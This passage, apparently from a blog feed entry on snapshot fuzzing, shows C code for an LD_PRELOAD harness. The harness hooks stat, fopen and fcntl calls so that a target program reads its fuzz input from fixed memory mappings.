<span class="n">fopen64_t</span> <span class="n">real_fopen64</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Declare prototype for the real __fxstat</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">__fxstat_t</span><span class="p">)(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="kt">int</span> <span class="n">__filedesc</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">);</span>
<span class="n">__fxstat_t</span> <span class="n">real_fxstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Declare prototype for the real fcntl</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">fcntl_t</span><span class="p">)(</span><span class="kt">int</span> <span class="n">fildes</span><span class="p">,</span> <span class="kt">int</span> <span class="n">cmd</span><span class="p">,</span> <span class="p">...);</span>
<span class="n">fcntl_t</span> <span class="n">real_fcntl</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Returns memory address of *next* location of symbol in library search order</span>
<span class="k">static</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">_resolve_symbol</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">symbol</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Clear previous errors</span>
    <span class="n">dlerror</span><span class="p">();</span>

    <span class="c1">// Get symbol address</span>
    <span class="kt">void</span><span class="o">*</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">dlsym</span><span class="p">(</span><span class="n">RTLD_NEXT</span><span class="p">,</span> <span class="n">symbol</span><span class="p">);</span>

    <span class="c1">// Check for error</span>
    <span class="kt">char</span><span class="o">*</span> <span class="n">err</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="n">err</span> <span class="o">=</span> <span class="n">dlerror</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">addr</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"** Err resolving '%s' addr: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">symbol</span><span class="p">,</span> <span class="n">err</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
    
    <span class="k">return</span> <span class="n">addr</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Hook for __xstat </span>
<span class="kt">int</span> <span class="nf">__xstat</span><span class="p">(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span><span class="o">*</span> <span class="n">__stat_buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Resolve the real __xstat() on demand and maybe multiple times!</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">real_xstat</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_xstat</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"__xstat"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Assume the worst, always</span>
    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Special __ver value check to see if we're calling from constructor</span>
    <span class="k">if</span> <span class="p">(</span><span class="mh">0x1337</span> <span class="o">==</span> <span class="n">__ver</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// Patch back up the version value before sending to real xstat</span>
        <span class="n">__ver</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>

        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_xstat</span><span class="p">(</span><span class="n">__ver</span><span class="p">,</span> <span class="n">__filename</span><span class="p">,</span> <span class="n">__stat_buf</span><span class="p">);</span>

        <span class="c1">// Set the real_xstat back to NULL</span>
        <span class="n">real_xstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
        <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Determine if we're stat'ing our fuzzing target</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">__filename</span><span class="p">,</span> <span class="n">FUZZ_TARGET</span><span class="p">))</span> <span class="p">{</span>
        <span class="c1">// Update our global stat struct</span>
        <span class="n">st</span><span class="p">.</span><span class="n">st_size</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">;</span>

        <span class="c1">// Send it back to the caller, skip syscall</span>
        <span class="n">memcpy</span><span class="p">(</span><span class="n">__stat_buf</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">st</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">stat</span><span class="p">));</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Just a normal stat, send to real xstat</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_xstat</span><span class="p">(</span><span class="n">__ver</span><span class="p">,</span> <span class="n">__filename</span><span class="p">,</span> <span class="n">__stat_buf</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Exploratory hooks to see if we're using fopen() related functions to open</span>
<span class="c1">// our input file</span>
<span class="kt">FILE</span><span class="o">*</span> <span class="nf">fopen</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pathname</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">mode</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** fopen() called for '%s'</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">pathname</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Our fopen hook, return a FILE* to the caller, also, if we are opening our</span>
<span class="c1">// target make sure we're not able to write to the file</span>
<span class="kt">FILE</span><span class="o">*</span> <span class="nf">fopen64</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pathname</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">mode</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Resolve symbol on demand and only once</span>
    <span class="k">if</span> <span class="p">(</span><span class="nb">NULL</span> <span class="o">==</span> <span class="n">real_fopen64</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_fopen64</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"fopen64"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Check to see what file we're opening</span>
    <span class="kt">FILE</span><span class="o">*</span> <span class="n">ret</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">FUZZ_TARGET</span><span class="p">,</span> <span class="n">pathname</span><span class="p">))</span> <span class="p">{</span>
        <span class="c1">// We're trying to open our file, make sure it's a read-only mode</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">mode</span><span class="p">,</span> <span class="s">"r"</span><span class="p">))</span> <span class="p">{</span>
            <span class="n">printf</span><span class="p">(</span><span class="s">"** Attempt to open fuzz-target in illegal mode: '%s'</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">mode</span><span class="p">);</span>
            <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// Open shared memory FILE* and return to caller</span>
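        <span class="n">ret</span> <span class="o">=</span> <span class="n">fmemopen</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">,</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span><span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">,</span> <span class="n">mode</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="nb">NULL</span> <span class="o">==</span> <span class="n">ret</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">printf</span><span class="p">(</span><span class="s">"** fmemopen() failed for fuzzing target</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
            <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>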
        
        <span class="c1">// Make sure we've never fopen()'d our fuzzing target before</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">faked_fp</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">printf</span><span class="p">(</span><span class="s">"** Attempting to fopen64() fuzzing target more than once</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
            <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// Update faked_fp</span>
        <span class="n">faked_fp</span> <span class="o">=</span> <span class="n">ret</span><span class="p">;</span>

        <span class="c1">// Change the filedes to something we know</span>
        <span class="n">ret</span><span class="o">-&gt;</span><span class="n">_fileno</span> <span class="o">=</span> <span class="mi">1337</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// We're not opening our file, send to regular fopen</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_fopen64</span><span class="p">(</span><span class="n">pathname</span><span class="p">,</span> <span class="n">mode</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Return FILE stream ptr to caller</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Hook for __fxstat</span>
<span class="kt">int</span> <span class="nf">__fxstat</span> <span class="p">(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="kt">int</span> <span class="n">__filedesc</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Resolve the real fxstat</span>
    <span class="k">if</span> <span class="p">(</span><span class="nb">NULL</span> <span class="o">==</span> <span class="n">real_fxstat</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_fxstat</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"__fxstat"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Check to see if we're stat'ing our fuzz target</span>
    <span class="k">if</span> <span class="p">(</span><span class="mi">1337</span> <span class="o">==</span> <span class="n">__filedesc</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// Patch the global struct with current input size</span>
        <span class="n">st</span><span class="p">.</span><span class="n">st_size</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span><span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">;</span>

        <span class="c1">// Copy global stat struct back to caller</span>
        <span class="n">memcpy</span><span class="p">(</span><span class="n">__stat_buf</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">st</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">stat</span><span class="p">));</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Normal stat, send to real fxstat</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_fxstat</span><span class="p">(</span><span class="n">__ver</span><span class="p">,</span> <span class="n">__filedesc</span><span class="p">,</span> <span class="n">__stat_buf</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Hook for fcntl</span>
<span class="kt">int</span> <span class="nf">fcntl</span><span class="p">(</span><span class="kt">int</span> <span class="n">fildes</span><span class="p">,</span> <span class="kt">int</span> <span class="n">cmd</span><span class="p">,</span> <span class="p">...)</span> <span class="p">{</span>
    <span class="c1">// Resolve fcntl symbol if needed</span>
    <span class="k">if</span> <span class="p">(</span><span class="nb">NULL</span> <span class="o">==</span> <span class="n">real_fcntl</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_fcntl</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"fcntl"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">fildes</span> <span class="o">==</span> <span class="mi">1337</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">O_RDONLY</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">else</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"** fcntl() called for real file descriptor</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Map memory to hold our inputs in memory and information about their size</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">_create_mem_mappings</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">void</span> <span class="o">*</span><span class="n">result</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

    <span class="c1">// Map the page to hold the input size</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span>
        <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">INPUT_SZ_ADDR</span><span class="p">),</span>
        <span class="k">sizeof</span><span class="p">(</span><span class="kt">size_t</span><span class="p">),</span>
        <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span>
        <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_FIXED</span><span class="p">,</span>
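        <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="c1">// fd is ignored for MAP_ANONYMOUS; -1 is the portable value</span>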
        <span class="mi">0</span>
    <span class="p">);</span>
    <span class="k">if</span> <span class="p">((</span><span class="n">MAP_FAILED</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="n">result</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"** Err mapping INPUT_SZ_ADDR, mapped @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">result</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Let's actually initialize the value at the input size location as well</span>
    <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

    <span class="c1">// Map the pages to hold the input contents</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span>
        <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">INPUT_ADDR</span><span class="p">),</span>
        <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="n">MAX_INPUT_SZ</span><span class="p">),</span>
        <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span>
        <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_FIXED</span><span class="p">,</span>
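        <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="c1">// fd is ignored for MAP_ANONYMOUS; -1 is the portable value</span>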
        <span class="mi">0</span>
    <span class="p">);</span>
    <span class="k">if</span> <span class="p">((</span><span class="n">MAP_FAILED</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="n">result</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"** Err mapping INPUT_ADDR, mapped @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">result</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Zero the input buffer explicitly</span>
    <span class="n">memset</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">MAX_INPUT_SZ</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Create a "legit" stat struct globally to pass to callers</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">_setup_stat_struct</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">result</span> <span class="o">=</span> <span class="n">__xstat</span><span class="p">(</span><span class="mh">0x1337</span><span class="p">,</span> <span class="n">FUZZ_TARGET</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">st</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"** Err creating stat struct for '%s' during load</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">FUZZ_TARGET</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Used for testing: load TEST_FILE (e.g. /bin/ed) into the input buffer and update its size info</span>
<span class="cp">#ifdef TEST
</span><span class="k">static</span> <span class="kt">void</span> <span class="nf">_test_func</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Open TEST_FILE for reading</span>
    <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">TEST_FILE</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="n">fd</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"** Failed to open '%s' during test</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">TEST_FILE</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

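    <span class="c1">// Attempt to read up to the max input buf size</span>
    <span class="kt">ssize_t</span> <span class="n">bytes</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">,</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">MAX_INPUT_SZ</span><span class="p">);</span>
    <span class="n">close</span><span class="p">(</span><span class="n">fd</span><span class="p">);</span>

    <span class="c1">// Bail on a failed read so we never store (size_t)-1 as the input size</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="n">bytes</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"** Failed to read '%s' during test</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">TEST_FILE</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>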

    <span class="c1">// Update the input size</span>
    <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">bytes</span><span class="p">;</span>
<span class="p">}</span>
<span class="cp">#endif
</span>
<span class="c1">// Routine to be called when our shared object is loaded</span>
<span class="n">__attribute__</span><span class="p">((</span><span class="n">constructor</span><span class="p">))</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">_hook_load</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Create memory mappings to hold our input and information about its size</span>
    <span class="n">_create_mem_mappings</span><span class="p">();</span>

    <span class="c1">// Setup global "legit" stat struct</span>
    <span class="n">_setup_stat_struct</span><span class="p">();</span>

    <span class="c1">// If we're testing, load TEST_FILE (e.g. /bin/ed) into our input buffer and update its size</span>
<span class="cp">#ifdef TEST
</span>    <span class="n">_test_func</span><span class="p">();</span>
<span class="cp">#endif
</span><span class="p">}</span>
</code></pre></div></div>]]></content><author><name></name></author><category term="fuzzing" /><category term="harnessing" /><category term="snapshot_fuzzing" /><summary type="html"><![CDATA[Introduction It’s been a while since I’ve done one of these, and one of my goals this year is to do more so here we are. A side project of mine is kind of reaching a good stopping point so I’ll have more free-time to do my own research and blog again. Looking forward to sharing more and more this year.]]></summary></entry></feed>